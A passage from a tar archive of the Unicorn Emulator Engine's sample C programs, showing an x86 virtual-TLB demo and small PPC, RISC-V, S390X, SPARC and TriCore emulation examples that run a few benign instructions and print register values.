memory for tlb\n"); exit(1); } printf("set up the tlb\n"); x86_mmu_prepare_tlb(uc, 0x0, tlb_base); x86_mmu_pt_set(uc, 0x2000, 0x0, tlb_base); x86_mmu_pt_set(uc, 0x4000, 0x1000, tlb_base); err = uc_ctl_flush_tlb(uc); if (err) { printf("failed to flush tlb\n"); exit(1); } printf("run the parrent\n"); err = uc_emu_start(uc, 0x2000, 0x0, 0, 0); if (err) { printf("failed to run parrent\n"); exit(1); } printf("save the context for the child\n"); err = uc_context_save(uc, context); printf("finish the parrent\n"); err = uc_reg_read(uc, UC_X86_REG_RIP, &rip); if (err) { printf("failed to read rip\n"); exit(1); } err = uc_emu_start(uc, rip, 0x0, 0, 0); if (err) { printf("failed to flush tlb\n"); exit(1); } printf("restore the context for the child\n"); err = uc_context_restore(uc, context); if (err) { printf("failed to restore context\n"); exit(1); } x86_mmu_prepare_tlb(uc, 0x0, tlb_base); x86_mmu_pt_set(uc, 0x4000, 0x2000, tlb_base); rax = 0; err = uc_reg_write(uc, UC_X86_REG_RAX, &rax); if (err) { printf("failed to write rax\n"); exit(1); } err = uc_ctl_flush_tlb(uc); if (err) { printf("failed to flush tlb\n"); exit(1); } err = uc_emu_start(uc, rip, 0x0, 0, 0); if (err) { printf("failed to run child\n"); exit(1); } err = uc_mem_read(uc, 0x1000, &parrent, sizeof(parrent)); if (err) { printf("failed to read from parrent memory\n"); exit(1); } err = uc_mem_read(uc, 0x2000, &child, sizeof(child)); if (err) { printf("failed to 
static bool virtual_tlb_callback(uc_engine *uc, uint64_t addr,
                                 uc_mem_type type, uc_tlb_entry *result,
                                 void *user_data)
{
    bool *parent_done = user_data;

    printf("tlb lookup for address: 0x%lX\n", addr);
    switch (addr & ~(0xfff)) {
    case 0x2000:
        result->paddr = 0x0;
        result->perms = UC_PROT_EXEC;
        return true;
    case 0x4000:
        if (*parent_done) {
            result->paddr = 0x2000;
        } else {
            result->paddr = 0x1000;
        }
        result->perms = UC_PROT_READ | UC_PROT_WRITE;
        return true;
    default:
        break;
    }
    return false;
}

void virtual_tlb(void)
{
    uint64_t rax, rip;
    bool parent_done = false;
    uint64_t parent, child;
    uc_context *context;
    uc_engine *uc;
    uc_err err;
    uc_hook h1, h2, h3;

    printf("Emulate x86 amd64 code with virtual mmu\n");

    err = uc_open(UC_ARCH_X86, UC_MODE_64, &uc);
    if (err) {
        printf("Failed on uc_open() with error returned: %u\n", err);
        exit(1);
    }
    uc_ctl_tlb_mode(uc, UC_TLB_VIRTUAL);

    err = uc_context_alloc(uc, &context);
    if (err) {
        printf("Failed on uc_context_alloc() with error returned: %u\n", err);
        exit(1);
    }

    err = uc_hook_add(uc, &h1, UC_HOOK_INSN, &x86_mmu_syscall_callback,
                      &parent_done, 1, 0, UC_X86_INS_SYSCALL);
    if (err) {
        printf("Failed on uc_hook_add() with error returned: %u\n", err);
        exit(1);
    }

    // Memory hooks are called after the mmu translation, so hook the
    // physical addresses
    err = uc_hook_add(uc, &h2, UC_HOOK_MEM_WRITE, &mmu_write_callback, NULL,
                      0x1000, 0x3000);
    if (err) {
        printf("Failed on uc_hook_add() with error returned: %u\n", err);
    }

    printf("map code\n");
    err = uc_mem_map(uc, 0x0, 0x1000, UC_PROT_ALL); // Code
    if (err) {
        printf("Failed on uc_mem_map() with error returned: %u\n", err);
        exit(1);
    }
    err = uc_mem_write(uc, 0x0, code, sizeof(code) - 1);
    if (err) {
        printf("Failed on uc_mem_write() with error returned: %u\n", err);
        exit(1);
    }

    printf("map parent memory\n");
    err = uc_mem_map(uc, 0x1000, 0x1000, UC_PROT_ALL); // Parent
    if (err) {
        printf("Failed on uc_mem_map() with error returned: %u\n", err);
        exit(1);
    }

    printf("map child memory\n");
    err = uc_mem_map(uc, 0x2000, 0x1000, UC_PROT_ALL); // Child
    if (err) {
        printf("failed to map child memory\n");
        exit(1);
    }

    err = uc_hook_add(uc, &h3, UC_HOOK_TLB_FILL, virtual_tlb_callback,
                      &parent_done, 1, 0);

    printf("run the parent\n");
    err = uc_emu_start(uc, 0x2000, 0x0, 0, 0);
    if (err) {
        printf("failed to run parent\n");
        exit(1);
    }

    printf("save the context for the child\n");
    err = uc_context_save(uc, context);

    printf("finish the parent\n");
    err = uc_reg_read(uc, UC_X86_REG_RIP, &rip);
    if (err) {
        printf("failed to read rip\n");
        exit(1);
    }
    err = uc_emu_start(uc, rip, 0x0, 0, 0);
    if (err) {
        printf("failed to finish the parent\n");
        exit(1);
    }

    printf("restore the context for the child\n");
    err = uc_context_restore(uc, context);
    if (err) {
        printf("failed to restore context\n");
        exit(1);
    }
    rax = 0;
    parent_done = true;
    err = uc_reg_write(uc, UC_X86_REG_RAX, &rax);
    if (err) {
        printf("failed to write rax\n");
        exit(1);
    }
    err = uc_ctl_flush_tlb(uc);
    if (err) {
        printf("failed to flush tlb\n");
        exit(1);
    }
    err = uc_emu_start(uc, rip, 0x0, 0, 0);
    if (err) {
        printf("failed to run child\n");
        exit(1);
    }

    err = uc_mem_read(uc, 0x1000, &parent, sizeof(parent));
    if (err) {
        printf("failed to read from parent memory\n");
        exit(1);
    }
    err = uc_mem_read(uc, 0x2000, &child, sizeof(child));
    if (err) {
        printf("failed to read from child memory\n");
        exit(1);
    }
    printf("parent result == %lu\n", parent);
    printf("child result == %lu\n", child);
    uc_close(uc);
}

int main(void)
{
    cpu_tlb();
    virtual_tlb();
}

unicorn-2.1.1/samples/sample_ppc.c

/* Unicorn Emulator Engine */
/* By simigo79, 2020 */

/* Sample code to demonstrate how to emulate PPC code */

#include <unicorn/unicorn.h>
#include <string.h>

// code to be emulated
#define PPC_CODE "\x7F\x46\x1A\x14" // add r26, r6, r3

// memory address where emulation starts
#define ADDRESS 0x10000

static void hook_block(uc_engine *uc, uint64_t address, uint32_t size,
                       void *user_data)
{
    printf(">>> Tracing basic block at 0x%" PRIx64 ", block size = 0x%x\n",
           address, size);
}

static void hook_code(uc_engine *uc, uint64_t address, uint32_t size,
                      void *user_data)
{
    printf(">>> Tracing instruction at 0x%" PRIx64
           ", instruction size = 0x%x\n",
           address, size);
}

static void test_ppc(void)
{
    uc_engine *uc;
    uc_err err;
    uc_hook trace1, trace2;

    int r3 = 0x1234;  // R3 register
    int r6 = 0x6789;  // R6 register
    int r26 = 0x8877; // R26 register (result)

    printf("Emulate PPC code\n");

    // Initialize emulator in PPC mode
    err = uc_open(UC_ARCH_PPC, UC_MODE_PPC32 | UC_MODE_BIG_ENDIAN, &uc);
    if (err) {
        printf("Failed on uc_open() with error returned: %u (%s)\n", err,
               uc_strerror(err));
        return;
    }

    // map 2MB memory for this emulation
    uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL);

    // write machine code to be emulated to memory
    uc_mem_write(uc, ADDRESS, PPC_CODE, sizeof(PPC_CODE) - 1);

    // initialize machine registers
    uc_reg_write(uc, UC_PPC_REG_3, &r3);
    uc_reg_write(uc, UC_PPC_REG_6, &r6);
    uc_reg_write(uc, UC_PPC_REG_26, &r26);

    // tracing all basic blocks with customized callback
    uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0);

    // tracing one instruction at ADDRESS with customized callback
    uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, ADDRESS, ADDRESS);

    // emulate machine code in infinite time (last param = 0), or when
    // finishing all the code.
    err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(PPC_CODE) - 1, 0, 0);
    if (err) {
        printf("Failed on uc_emu_start() with error returned: %u\n", err);
        return;
    }

    // now print out some registers
    printf(">>> Emulation done. 
Below is the CPU context\n"); uc_reg_read(uc, UC_PPC_REG_26, &r26); printf(">>> r26 = 0x%x\n", r26); // close engine when done uc_close(uc); } int main(int argc, char **argv, char **envp) { test_ppc(); return 0; } ��������������������������������unicorn-2.1.1/samples/sample_riscv.c����������������������������������������������������������������0000664�0000000�0000000�00000041120�14675241067�0017501�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* Sample code to demonstrate how to emulate RISCV code */ #include <unicorn/unicorn.h> #include <string.h> // code to be emulated #if 0 $ cstool riscv64 1305100093850502 0 13 05 10 00 addi a0, zero, 1 4 93 85 05 02 addi a1, a1, 0x20 #endif // #define RISCV_CODE "\x13\x05\x10\x00\x93\x85\x05\x02\x93\x85\x05\x02" #define RISCV_CODE "\x13\x05\x10\x00\x93\x85\x05\x02" // memory address where emulation starts #define ADDRESS 0x10000 static void hook_block(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf(">>> Tracing basic block at 0x%" PRIx64 ", block size = 0x%x\n", address, size); } static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf(">>> Tracing instruction at 0x%" PRIx64 ", instruction size = 0x%x\n", address, size); } static void hook_code3(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf(">>> Tracing instruction at 0x%" PRIx64 ", instruction size = 0x%x\n", address, size); if (address == ADDRESS) { printf("stop emulation\n"); uc_emu_stop(uc); } } static void test_riscv(void) { uc_engine *uc; uc_hook trace1, trace2; uc_err err; uint32_t a0 = 0x1234; uint32_t a1 = 0x7890; printf("Emulate RISCV code\n"); // Initialize emulator in RISCV64 mode err = uc_open(UC_ARCH_RISCV, UC_MODE_RISCV32, &uc); if (err) { printf("Failed on uc_open() with error returned: %u (%s)\n", err, uc_strerror(err)); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc_mem_write(uc, ADDRESS, RISCV_CODE, sizeof(RISCV_CODE) - 1); // initialize machine registers uc_reg_write(uc, UC_RISCV_REG_A0, &a0); uc_reg_write(uc, UC_RISCV_REG_A1, &a1); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing all instruction uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, 1, 0); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(RISCV_CODE) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } // now print out some registers printf(">>> Emulation done. 
Below is the CPU context\n"); uc_reg_read(uc, UC_RISCV_REG_A0, &a0); uc_reg_read(uc, UC_RISCV_REG_A1, &a1); printf(">>> A0 = 0x%x\n", a0); printf(">>> A1 = 0x%x\n", a1); uc_close(uc); } static void test_riscv2(void) { uc_engine *uc; uc_hook trace1, trace2; uc_err err; uint32_t a0 = 0x1234; uint32_t a1 = 0x7890; printf("Emulate RISCV code: split emulation\n"); // Initialize emulator in RISCV64 mode err = uc_open(UC_ARCH_RISCV, UC_MODE_RISCV32, &uc); if (err) { printf("Failed on uc_open() with error returned: %u (%s)\n", err, uc_strerror(err)); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc_mem_write(uc, ADDRESS, RISCV_CODE, sizeof(RISCV_CODE) - 1); // initialize machine registers uc_reg_write(uc, UC_RISCV_REG_A0, &a0); uc_reg_write(uc, UC_RISCV_REG_A1, &a1); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing all instruction uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, 1, 0); // emulate 1 instruction err = uc_emu_start(uc, ADDRESS, ADDRESS + 4, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } uc_reg_read(uc, UC_RISCV_REG_A0, &a0); uc_reg_read(uc, UC_RISCV_REG_A1, &a1); printf(">>> A0 = 0x%x\n", a0); printf(">>> A1 = 0x%x\n", a1); // emulate one more instruction err = uc_emu_start(uc, ADDRESS + 4, ADDRESS + 8, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } // now print out some registers printf(">>> Emulation done. Below is the CPU context\n"); uc_reg_read(uc, UC_RISCV_REG_A0, &a0); uc_reg_read(uc, UC_RISCV_REG_A1, &a1); printf(">>> A0 = 0x%x\n", a0); printf(">>> A1 = 0x%x\n", a1); uc_close(uc); } static void test_riscv3(void) { uc_engine *uc; uc_hook trace1, trace2; uc_err err; uint32_t a0 = 0x1234; uint32_t a1 = 0x7890; printf("Emulate RISCV code: early stop\n"); // Initialize emulator in RISCV64 mode err = uc_open(UC_ARCH_RISCV, UC_MODE_RISCV32, &uc); if (err) { printf("Failed on uc_open() with error returned: %u (%s)\n", err, uc_strerror(err)); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc_mem_write(uc, ADDRESS, RISCV_CODE, sizeof(RISCV_CODE) - 1); // initialize machine registers uc_reg_write(uc, UC_RISCV_REG_A0, &a0); uc_reg_write(uc, UC_RISCV_REG_A1, &a1); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing all instruction uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code3, NULL, 1, 0); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(RISCV_CODE) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } // now print out some registers printf(">>> Emulation done. 
Below is the CPU context\n"); uc_reg_read(uc, UC_RISCV_REG_A0, &a0); uc_reg_read(uc, UC_RISCV_REG_A1, &a1); printf(">>> A0 = 0x%x\n", a0); printf(">>> A1 = 0x%x\n", a1); uc_close(uc); } static void test_riscv_step(void) { uc_engine *uc; uc_hook trace1, trace2; uc_err err; uint32_t a0 = 0x1234; uint32_t a1 = 0x7890; uint32_t pc = 0x0000; printf("Emulate RISCV code: step\n"); // Initialize emulator in RISCV64 mode err = uc_open(UC_ARCH_RISCV, UC_MODE_RISCV32, &uc); if (err) { printf("Failed on uc_open() with error returned: %u (%s)\n", err, uc_strerror(err)); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc_mem_write(uc, ADDRESS, RISCV_CODE, sizeof(RISCV_CODE) - 1); // initialize machine registers uc_reg_write(uc, UC_RISCV_REG_A0, &a0); uc_reg_write(uc, UC_RISCV_REG_A1, &a1); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing all instruction uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, 1, 0); // emulate 1 instruction err = uc_emu_start(uc, ADDRESS, ADDRESS + 12, 0, 1); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } uc_reg_read(uc, UC_RISCV_REG_A0, &a0); uc_reg_read(uc, UC_RISCV_REG_A1, &a1); uc_reg_read(uc, UC_RISCV_REG_PC, &pc); printf(">>> A0 = 0x%x\n", a0); printf(">>> A1 = 0x%x\n", a1); if (pc != 0x10004) { printf("Error after step: PC is: 0x%x, expected was 0x10004\n", pc); } // emulate one more instruction err = uc_emu_start(uc, ADDRESS + 4, ADDRESS + 8, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } // now print out some registers printf(">>> Emulation done. Below is the CPU context\n"); uc_reg_read(uc, UC_RISCV_REG_A0, &a0); uc_reg_read(uc, UC_RISCV_REG_A1, &a1); printf(">>> A0 = 0x%x\n", a0); printf(">>> A1 = 0x%x\n", a1); uc_close(uc); } static void test_riscv_timeout(void) { uc_engine *uc; uc_hook trace1, trace2; uc_err err; uint32_t a0 = 0x1234; uint32_t a1 = 0x7890; uint32_t pc = 0x0000; printf("Emulate RISCV code: timeout\n"); // Initialize emulator in RISCV64 mode err = uc_open(UC_ARCH_RISCV, UC_MODE_RISCV32, &uc); if (err) { printf("Failed on uc_open() with error returned: %u (%s)\n", err, uc_strerror(err)); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc_mem_write(uc, ADDRESS, "\x00\x00\x00\x00\x00\x00\x00\x00", 8); // initialize machine registers uc_reg_write(uc, UC_RISCV_REG_A0, &a0); uc_reg_write(uc, UC_RISCV_REG_A1, &a1); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing all instruction uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, 1, 0); // emulate 1 instruction with timeout err = uc_emu_start(uc, ADDRESS, ADDRESS + 4, 1000, 1); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } uc_reg_read(uc, UC_RISCV_REG_PC, &pc); if (pc != 0x10000) { printf("Error after step: PC is: 0x%x, expected was 0x10004\n", pc); } // emulate 1 instruction with timeout err = uc_emu_start(uc, ADDRESS, ADDRESS + 4, 1000, 1); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } uc_reg_read(uc, UC_RISCV_REG_PC, &pc); if (pc != 0x10000) { printf("Error after step: PC is: 0x%x, expected was 0x10004\n", pc); } // now print out some registers printf(">>> Emulation done\n"); uc_close(uc); } static 
void test_riscv_sd64(void) { uc_engine *uc; uc_hook trace1, trace2; uc_err err; uint64_t reg; /* 00813823 sd s0,16(sp) 00000013 nop */ #define CODE64 "\x23\x38\x81\x00\x13\x00\x00\x00" printf("Emulate RISCV code: sd64 instruction\n"); // Initialize emulator in RISCV64 mode err = uc_open(UC_ARCH_RISCV, UC_MODE_RISCV64, &uc); if (err) { printf("Failed on uc_open() with error returned: %u (%s)\n", err, uc_strerror(err)); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc_mem_write(uc, ADDRESS, CODE64, sizeof(CODE64) - 1); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing all instruction uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, 1, 0); reg = ADDRESS + 0x100; uc_reg_write(uc, UC_RISCV_REG_SP, ®); reg = 0x11223344; uc_reg_write(uc, UC_RISCV_REG_S0, ®); // execute instruction err = uc_emu_start(uc, 0x10000, -1, 0, 1); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } // now print out some registers printf(">>> Emulation done.\n"); uc_close(uc); } static bool hook_memalloc(uc_engine *uc, uc_mem_type type, uint64_t address, int size, int64_t value, void *user_data) { uint64_t algined_address = address & 0xFFFFFFFFFFFFF000ULL; int aligned_size = ((int)(size / 0x1000) + 1) * 0x1000; printf(">>> Allocating block at 0x%" PRIx64 " (0x%" PRIx64 "), block size = 0x%x (0x%x)\n", address, algined_address, size, aligned_size); uc_mem_map(uc, algined_address, aligned_size, UC_PROT_ALL); // this recovers from missing memory, so we return true return true; } static void test_recover_from_illegal(void) { uc_engine *uc; uc_hook trace1, trace2, mem_alloc; uc_err err; uint64_t a0 = 0x1234; uint64_t a1 = 0x7890; printf("Emulate RISCV code: recover_from_illegal\n"); // Initialize emulator in RISCV64 mode err = uc_open(UC_ARCH_RISCV, UC_MODE_RISCV64, &uc); if (err) { printf("Failed on uc_open() with error returned: %u\n", err); return; } uc_reg_write(uc, UC_RISCV_REG_A0, &a0); uc_reg_write(uc, UC_RISCV_REG_A1, &a1); // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // auto-allocate memory on access uc_hook_add(uc, &mem_alloc, UC_HOOK_MEM_UNMAPPED, hook_memalloc, NULL, 1, 0); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing all instruction uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, 1, 0); // write machine code to be emulated to memory uc_mem_write(uc, ADDRESS, RISCV_CODE, sizeof(RISCV_CODE) - 1); // emulate 1 instruction, wrong address, illegal code err = uc_emu_start(uc, 0x1000, -1, 0, 1); if (err != UC_ERR_INSN_INVALID) { printf("Expected Illegal Instruction error, got: %u\n", err); } // emulate 1 instruction, correct address, valid code err = uc_emu_start(uc, ADDRESS, -1, 0, 1); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } // now print out some registers printf(">>> Emulation done. 
Below is the CPU context\n"); uc_reg_read(uc, UC_RISCV_REG_A0, &a0); uc_reg_read(uc, UC_RISCV_REG_A1, &a1); printf(">>> A0 = 0x%" PRIx64 "\n", a0); printf(">>> A1 = 0x%" PRIx64 "\n", a1); uc_close(uc); } static void test_riscv_func_return(void) { uc_engine *uc; uc_hook trace1, trace2; uc_err err; uint64_t pc = 0, ra = 0; // 10000: 00008067 ret // 10004: 8082 c.ret // 10006: 0001 nop // 10008: 0001 nop #define CODE "\x67\x80\x00\x00\x82\x80\x01\x00\x01\x00" printf("Emulate RISCV code: return from func\n"); // Initialize emulator in RISCV64 mode err = uc_open(UC_ARCH_RISCV, UC_MODE_RISCV64, &uc); if (err) { printf("Failed on uc_open() with error returned: %u (%s)\n", err, uc_strerror(err)); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc_mem_write(uc, ADDRESS, CODE, sizeof(CODE) - 1); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing all instruction uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, 1, 0); #if 1 // set return address register // RET instruction will return to address in RA // so after RET, PC == RA ra = 0x10006; uc_reg_write(uc, UC_RISCV_REG_RA, &ra); // execute ret instruction err = uc_emu_start(uc, 0x10000, -1, 0, 1); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } uc_reg_read(uc, UC_RISCV_REG_PC, &pc); if (pc != ra) { printf("Error after execution: PC is: 0x%" PRIx64 ", expected was 0x%" PRIx64 "\n", pc, ra); if (pc == 0x10000) { printf(" PC did not change during execution\n"); } } else { printf("Good, PC == RA\n"); } #endif // set return address register // C.RET instruction will return to address in RA // so after C.RET, PC == RA ra = 0x10006; uc_reg_write(uc, UC_RISCV_REG_RA, &ra); printf("========\n"); // execute c.ret instruction err = uc_emu_start(uc, 0x10004, -1, 0, 1); if (err) { printf("Failed on uc_emu_start() with error returned: %u\n", err); } uc_reg_read(uc, UC_RISCV_REG_PC, &pc); if (pc != ra) { printf("Error after execution: PC is: 0x%" PRIx64 ", expected was 0x%" PRIx64 "\n", pc, ra); if (pc == 0x10004) { printf(" PC did not change during execution\n"); } } else { printf("Good, PC == RA\n"); } // now print out some registers printf(">>> Emulation done.\n"); uc_close(uc); } int main(int argc, char **argv, char **envp) { test_recover_from_illegal(); printf("------------------\n"); test_riscv(); printf("------------------\n"); test_riscv2(); printf("------------------\n"); test_riscv3(); printf("------------------\n"); test_riscv_step(); printf("------------------\n"); test_riscv_timeout(); printf("------------------\n"); test_riscv_sd64(); printf("------------------\n"); test_riscv_func_return(); return 0; } 
unicorn-2.1.1/samples/sample_s390x.c

/* Unicorn Emulator Engine */
/* By Nguyen Anh Quynh, 2021 */

/* Sample code to demonstrate how to emulate S390X code */

#include <unicorn/unicorn.h>
#include <string.h>

// code to be emulated
#define S390X_CODE "\x18\x23" // lr %r2, %r3

// memory address where emulation starts
#define ADDRESS 0x10000

static void hook_block(uc_engine *uc, uint64_t address, uint32_t size,
                       void *user_data)
{
    printf(">>> Tracing basic block at 0x%" PRIx64 ", block size = 0x%x\n",
           address, size);
}

static void hook_code(uc_engine *uc, uint64_t address, uint32_t size,
                      void *user_data)
{
    printf(">>> Tracing instruction at 0x%" PRIx64
           ", instruction size = 0x%x\n",
           address, size);
}

static void test_s390x(void)
{
    uc_engine *uc;
    uc_hook trace1, trace2;
    uc_err err;

    uint64_t r2 = 2, r3 = 3;

    printf("Emulate S390X code\n");

    // Initialize emulator in S390X mode
    err = uc_open(UC_ARCH_S390X, UC_MODE_BIG_ENDIAN, &uc);
    if (err) {
        printf("Failed on uc_open() with error returned: %u (%s)\n", err,
               uc_strerror(err));
        return;
    }

    // map 1MB memory for this emulation
    uc_mem_map(uc, ADDRESS, 1024 * 1024, UC_PROT_ALL);

    // write machine code to be emulated to memory
    uc_mem_write(uc, ADDRESS, S390X_CODE, sizeof(S390X_CODE) - 1);

    // initialize machine registers
    uc_reg_write(uc, UC_S390X_REG_R2, &r2);
    uc_reg_write(uc, UC_S390X_REG_R3, &r3);

    // tracing all basic blocks with customized callback
    uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0);

    // tracing all instructions
    uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, 1, 0);

    // emulate machine code in infinite time (last param = 0), or when
    // finishing all the code.
    err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(S390X_CODE) - 1, 0, 0);
    if (err) {
        printf("Failed on uc_emu_start() with error returned: %u (%s)\n", err,
               uc_strerror(err));
    }

    // now print out some registers
    printf(">>> Emulation done. 
Below is the CPU context\n"); uc_reg_read(uc, UC_S390X_REG_R2, &r2); uc_reg_read(uc, UC_S390X_REG_R3, &r3); printf(">>> R2 = 0x%" PRIx64 "\t\t>>> R3 = 0x%" PRIx64 "\n", r2, r3); uc_close(uc); } int main(int argc, char **argv, char **envp) { test_s390x(); return 0; } ��������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/samples/sample_sparc.c����������������������������������������������������������������0000664�0000000�0000000�00000005016�14675241067�0017467�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Unicorn Emulator Engine */ /* By Nguyen Anh Quynh, 2015 */ /* Sample code to demonstrate how to emulate Sparc code */ #include <unicorn/unicorn.h> #include <string.h> // code to be emulated #define SPARC_CODE "\x86\x00\x40\x02" // add %g1, %g2, %g3; // #define SPARC_CODE "\xbb\x70\x00\x00" // illegal code // memory address where emulation starts #define ADDRESS 0x10000 static void hook_block(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf(">>> Tracing basic block at 0x%" PRIx64 ", block size = 0x%x\n", address, size); } static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf(">>> Tracing instruction at 0x%" PRIx64 ", instruction size = 0x%x\n", address, size); } static void test_sparc(void) { uc_engine *uc; uc_err err; uc_hook trace1, trace2; int g1 = 0x1230; // G1 register int g2 = 0x6789; // G2 register int g3 = 0x5555; // G3 register printf("Emulate SPARC code\n"); // Initialize emulator in Sparc mode err = uc_open(UC_ARCH_SPARC, UC_MODE_SPARC32 | UC_MODE_BIG_ENDIAN, &uc); if (err) { printf("Failed on uc_open() with error returned: %u (%s)\n", err, uc_strerror(err)); return; } // map 2MB memory for this emulation uc_mem_map(uc, ADDRESS, 2 * 1024 * 1024, UC_PROT_ALL); // write machine code to be emulated to memory uc_mem_write(uc, ADDRESS, SPARC_CODE, sizeof(SPARC_CODE) - 1); // initialize machine registers uc_reg_write(uc, UC_SPARC_REG_G1, &g1); uc_reg_write(uc, UC_SPARC_REG_G2, &g2); uc_reg_write(uc, UC_SPARC_REG_G3, &g3); // tracing all basic blocks with customized callback uc_hook_add(uc, &trace1, UC_HOOK_BLOCK, hook_block, NULL, 1, 0); // tracing all instructions with customized callback uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, 1, 0); // emulate machine code in infinite time (last param = 0), or when // finishing all the code. err = uc_emu_start(uc, ADDRESS, ADDRESS + sizeof(SPARC_CODE) - 1, 0, 0); if (err) { printf("Failed on uc_emu_start() with error returned: %u (%s)\n", err, uc_strerror(err)); } // now print out some registers printf(">>> Emulation done. 
Below is the CPU context\n"); uc_reg_read(uc, UC_SPARC_REG_G3, &g3); printf(">>> G3 = 0x%x\n", g3); uc_close(uc); } int main(int argc, char **argv, char **envp) { test_sparc(); return 0; } ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/samples/sample_tricore.c��������������������������������������������������������������0000664�0000000�0000000�00000004625�14675241067�0020033�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Created for Unicorn Engine by Eric Poole <eric.poole@aptiv.com>, 2022 Copyright 2022 Aptiv */ /* Sample code to demonstrate how to emulate TriCore code */ #include <unicorn/unicorn.h> #include <string.h> // code to be emulated #define CODE "\x82\x11\xbb\x00\x00\x08" // mov d1, #0x1; mov.u d0, #0x8000 // memory address where emulation starts #define ADDRESS 0x10000 static void hook_block(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf(">>> Tracing basic block at 0x%" PRIx64 ", block size = 0x%x\n", address, size); } static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { printf(">>> Tracing instruction at 0x%" PRIx64 ", instruction size = 0x%x\n", address, size); } static void test_tricore(void) { uc_engine *uc; uc_err err; uc_hook trace1, trace2; uint32_t d0 = 0x0; // d0 register uint32_t d1 = 0x0; // d1 register printf("Emulate TriCore code\n"); // Initialize emulator in TriCore mode err = uc_open(UC_ARCH_TRICORE, UC_MODE_LITTLE_ENDIAN, &uc); if (err) { printf("Failed on uc_open() with error returned: %u (%s)\n", err, uc_strerror(err)); return; } // map 2MB memory for this emulation uc_mem_map(uc, 